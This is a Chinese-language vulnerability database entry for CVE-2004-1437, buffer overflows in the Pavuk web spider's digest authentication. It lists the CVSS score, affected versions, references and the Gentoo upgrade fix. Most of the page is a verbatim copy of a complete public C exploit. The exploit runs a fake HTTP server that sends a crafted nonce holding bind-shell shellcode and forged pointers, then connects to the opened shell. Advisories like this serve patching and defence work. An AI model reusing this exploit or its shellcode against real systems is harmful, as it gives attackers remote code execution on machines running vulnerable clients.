CVE-2004-1437
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:41:22
NMCOE    

[原文]Multiple buffer overflows in the digest authentication functionality in Pavuk 0.9.28-r2 and earlier allow remote attackers to execute arbitrary code.


[CNNVD]Pavuk远程摘要式身份验证缓冲区溢出漏洞(CNNVD-200412-352)

        Pavuk 0.9.28-r2及其早期版本的摘要式身份验证函数存在多个缓冲区溢出漏洞。远程攻击者可以利用该漏洞执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:pavuk:pavuk:0.928r2
cpe:/a:pavuk:pavuk:0.9pl28i
cpe:/a:pavuk:pavuk:0.928r1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1437
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1437
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-352
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/10797
(PATCH)  BID  10797
http://www.gentoo.org/security/en/glsa/glsa-200407-19.xml
(PATCH)  GENTOO  GLSA-200407-19
http://xforce.iss.net/xforce/xfdb/16807
(UNKNOWN)  XF  pavuk-digest-auth-bo(16807)

- 漏洞信息

Pavuk远程摘要式身份验证缓冲区溢出漏洞
高危 缓冲区溢出
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        Pavuk 0.9.28-r2及其早期版本的摘要式身份验证函数存在多个缓冲区溢出漏洞。远程攻击者可以利用该漏洞执行任意代码。

- 公告与补丁

        Gentoo has released advisory GLSA 200407-19 dealing with this issue. They have recommended that all Pavuk users should upgrade to the latest version:
        # emerge sync
        # emerge -pv ">=net-misc/pavuk-0.9.28-r3"
         # emerge ">=net-misc/pavuk-0.9.28-r3"
        Please see the referenced Gentoo advisory for more information.

- 漏洞信息 (380)

Pavuk Digest Authentication Buffer Overflow Remote Exploit (EDBID:380)
linux remote
2004-08-08 Verified
80 infamous41md
N/A [点击下载]
/*
 * exploit for pavuk web spider - infamous42md AT hotpop DOT com
 *
 *  shouts to mitakeet, skullandcircle, and thanks to matt murphy for making me
 *  realize a n00bish mistake i made.
 * 
 * this exploit probably deserves a bit of an explanation as it was not exactly
 * straight forward.  the vulnerable code looks like this, with some comments
 * inlined by me:
 */
#if 0
char *http_get_digest_auth_str(auth_digest, method, user, pass, urlp, buf)
http_digest_info *auth_digest;
char *method;
char *user;
char *pass;
url *urlp;
char *buf;
{
    /* this is the buffer we bitch slap */
	char pom[1024];
	char *a1,*a2,*a3;
	char *d = url_encode_str(urlp->p.http.document, URL_PATH_UNSAFE);

    /* not yet */
	sprintf(pom, "%s:%s:%s", user, auth_digest->realm, pass);
	a1 = _md5(pom);
	sprintf(pom, "%s:%s", method, d);

    /* this turns into a 32 byte string */
	a2 = _md5(pom);

    /* 
     * this is the point that we overflow the buffer.  we control
     * auth_digest->nonce, and that is where all of our evil code go.  but crap,
     * look, the string a2 gets appended to the nonce buffer, that means
     * whatever lives above the saved EIP we overwrite is going to get fuxxored
     * to.  that means the arguments to the function get trashed, usually not a
     * problem, but look below at the following sprintf().  those variables get 
     * used again, so we have to restore them to a sane state.  
     */ 
    sprintf(pom, "%s:%s:%s", a1, auth_digest->nonce, a2); 
    a3 = _md5(pom);

    /* crap */
	sprintf(buf,
		"Digest username=\"%s\", realm=\"%s\", nonce=\"%s\", uri=\"%s\", response=\"%s\"" , 
		user, auth_digest->realm, auth_digest->nonce, d, a3);

    /* more crap, we need to repair nearly all of the parameters */
	if (auth_digest->opaque)
	{
		strcat(buf, ", opaque=\"");
		strcat(buf, auth_digest->opaque);
		strcat(buf, "\"");
	}
	_free(d);
	_free(a1);
	_free(a2);
	_free(a3);

	return buf;
}
#endif
/*  
 *  so u can see we can't just overflow and go.  we need to recreate at least
 *  the auth_digest pointer, the user pointer, and the buf pointer.  so, the
 *  strategy is as follows:
 *
 *  + overwrite auth_digest to point into the buffer we control
 *  + where we point auth_digest must also contain valid pointers as they are
 *  used as the strings that get printed into buffer.
 *  + so we point those pointers towards the very end of our buffer.  the
 *  strings they point to should not be so long. our buffer is NULL termed so if
 *  they point towards the end of it, we know they'll end at a set point.
 *  + we set the user pointer to the same place as the auth_digest pointer.
 *  + we set buf to point past the end of our buffer, at some higher address.
 *  that is where all the other strings get printed to in sprintf() and
 *  strcat().
 *  + and that's about it. so our buffer looks like this:
 *
 *                          <-------------------|
 *  ALIGN NOPS SHELL STRING_PTRS RETADDR USER_AND_DIGEST_PTRS BUF_PTRS 
 *                      |----------------------------^           |------^
 *
 *  the only arg you pass is the base address of the buffer that we overwrite,
 *  which lays somewhere on the stack.  note this is not the location of our
 *  original buffer, but the location of the pom variable from above func.  and
 *  you need to be root as we bind to port 80 and pretend to be a webserver.
 * 
 *  [root@localho.outernet] ./ps       
 *      Usage: ./ps <base of nonce buffer>
 *  
 *  [root@localho.outernet] ./ps 0xbfffdb34
 *  got a shell
 *
 *  id
 *  uid=1000(n00b) gid=100(users) groups=100(users)
 *
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>

#define die(x) do{ perror((x)); exit(1); }while(0)
#define SHELL_PORT 7000
#define HTTP_PORT 80
#define BS 0x1000

/* probably don't need all this */
char *reply = 
"HTTP/1.1 401 Authorization Required\n"
"Date: Sat, 07 Aug 2004 02:10:07 GMT\n"
"Server: Apache/1.3.27 (Unix) PHP/4.3.1\n"
"WWW-Authenticate: Digest realm=\"time2die\" nonce=\"%s\"\n"
"Status: 401 Not Authorized\n"
"Connection: close\n"
"Content-Type: text/html\r\n\r\n";

/* call them */
char sc[] =
    "\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
    "\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
    "\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
    "\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
    "\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
    "\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
    "\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
    "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
    

int conn(struct sockaddr_in *sap)
{
    int sock;

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if(sock < 0)
        die("socket");
    if(connect(sock, (struct sockaddr *)sap, sizeof(*sap)) < 0)
        die("connect");

    return sock;
}
    
void shell(struct sockaddr_in *sap)
{
    int sock = 0, l = 0;
    char buf[BS];
    fd_set rfds;

    sap->sin_port = htons(SHELL_PORT);
    sock = conn(sap);

    printf("got a shell\n\n");
    FD_ZERO(&rfds);

    while (1) {
	    FD_SET(STDIN_FILENO, &rfds);
	    FD_SET(sock, &rfds);

	    if (select(sock + 1, &rfds, NULL, NULL, NULL) < 1)
	        die("select");

	    if (FD_ISSET(STDIN_FILENO, &rfds)) {
	        if ((l = read(0, buf, BS)) <= 0)
		        die("\n - Connection closed by user\n");
	        if (write(sock, buf, l) < 1)
		        die("write");
	    }

	    if (FD_ISSET(sock, &rfds)) {
	        l = read(sock, buf, sizeof(buf));

	        if (l == 0)
		        die("\n - Connection terminated.\n");
	        else if (l < 0)
		        die("\n - Read failure\n");

	        if (write(1, buf, l) < 1)
		        die("write");
	    }
    }
}

int do_listen()
{
    int sock = 0, on = 1;
    struct sockaddr_in  sa;

    memset(&sa, 0, sizeof(sa));
    sa.sin_family = AF_INET;
    sa.sin_port = htons(HTTP_PORT);
    sa.sin_addr.s_addr = INADDR_ANY;

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if(sock < 0)
        die("socket");

    if(setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on)) < 0)
        die("setsockopt");
    
    if(bind(sock, (struct sockaddr *)&sa, sizeof(sa)) < 0)
        die("bind");

    if(listen(sock, 1) < 0)
        die("listen");
    
    return sock;
}

void sploit(int sock, struct sockaddr_in *sap, u_long nbase)
{
    int len = 0, x;
    char    buf[BS], evil_nonce[BS];
    u_long  retaddr, ptrs_to_struct, fake_structs, new_buf;

    memset(buf, 0, BS), memset(evil_nonce, 0, BS);
    
    /* read the req */
    if(recv(sock, buf, BS, 0) < 0)
        die("read");

    /* build the buffer */

#define ALIGN 3
#define NNOPS 100
#define SHELL_LEN 132
#define PTRS_OFFSET (ALIGN+NNOPS+SHELL_LEN) /* the string pointers */
#define PTRS_LEN 500
#define RET_OFFSET (PTRS_OFFSET+PTRS_LEN)
#define RET_LEN 288
#define PPTRS_OFFSET (RET_OFFSET+RET_LEN)   /* the pointers to pointers */
#define PPTRS_LEN 20
#define BUF_OFFSET (PPTRS_OFFSET+PPTRS_LEN) /* the pointer to new buf */
#define BUF_LEN 20
#define TOTAL_LEN (BUF_OFFSET+BUF_LEN)

#define PTRS_LOC 1000   /* where the strings point to */
#define PPTRS_LOC 300   /* offset from base to the string pointers */
#define RET_LOC 50      /* offset of NOP buffer */
    fake_structs = nbase + PTRS_LOC;
    retaddr = nbase + RET_LOC;
    ptrs_to_struct = nbase + PPTRS_LOC;
    new_buf = nbase + TOTAL_LEN*2;

    /* the NOPS and shellcode */
    memset(evil_nonce, 'A', ALIGN);
    memset(evil_nonce+ALIGN, 0x90, BS);
    memcpy(evil_nonce+NNOPS+ALIGN, sc, SHELL_LEN);

    /* the fake pointers point towards end of buffer */
    for(x = 0; x < PTRS_LEN-3; x += sizeof(fake_structs))
        memcpy(evil_nonce+PTRS_OFFSET+x, &fake_structs, sizeof(fake_structs));

    /* the ret addr */
    for(x = 0; x < RET_LEN; x += sizeof(retaddr))
        memcpy(evil_nonce+RET_OFFSET+x, &retaddr, sizeof(retaddr));

    /* the pointers to the fake pointers */
    for(x = 0; x < PPTRS_LEN; x+= sizeof(ptrs_to_struct))
        memcpy(evil_nonce+PPTRS_OFFSET+x, &ptrs_to_struct, sizeof(ptrs_to_struct));

    /* and the new location for buf */
    for(x = 0; x < BUF_LEN; x+= sizeof(new_buf))
        memcpy(evil_nonce+BUF_OFFSET+x, &new_buf, sizeof(new_buf));
    
    evil_nonce[TOTAL_LEN] = 0;

    /* fill in HTTP reply */
    len = snprintf(buf, BS-1, reply, evil_nonce);

    /* i dont care what u request, you're getting the sploit */
    if(send(sock, buf, len, 0) < 0)
        die("send");

    close(sock);

    sleep(1);
    shell(sap);
}

int main(int argc, char **argv)
{
    int lsock, asock;
    u_long    nbase = 0;
    struct sockaddr_in  sa;
    pid_t   cpid;
    socklen_t   salen;

    if(argc < 2){
        fprintf(stderr, "\tUsage: %s <base of nonce buffer>\n", argv[0]);
        return EXIT_FAILURE;
    }
    sscanf(argv[1], "%lx\n", &nbase);
    
    lsock = do_listen();

    while(1){
        asock = accept(lsock, (struct sockaddr *)&sa, &salen);

        if( (cpid = fork()) == 0)
            sploit(asock, &sa, nbase);
        else if(cpid < 0)
            die("fork");
        
        close(asock);
    }

    return EXIT_SUCCESS;
}


// milw0rm.com [2004-08-08]
		

- 漏洞信息

8242
Pavuk Digest Authentication Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in Pavuk. The program fails to properly check nonce and realm fields which accompany a digest authentication challenge upon the receipt of a 401 (unauthorized) http error resulting in an overflow in sprintf() in the digest authentication handler. With a specially crafted response, an attacker can cause execution of arbitrary code resulting in a loss of confidentiality, integrity, and/or availability.

- 时间线

2004-07-27 2004-07-09
2004-08-07 Unknow

- 解决方案

Disable http digest authentication or upgrade to version 0.928r3 or higher, as it has been reported to fix this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站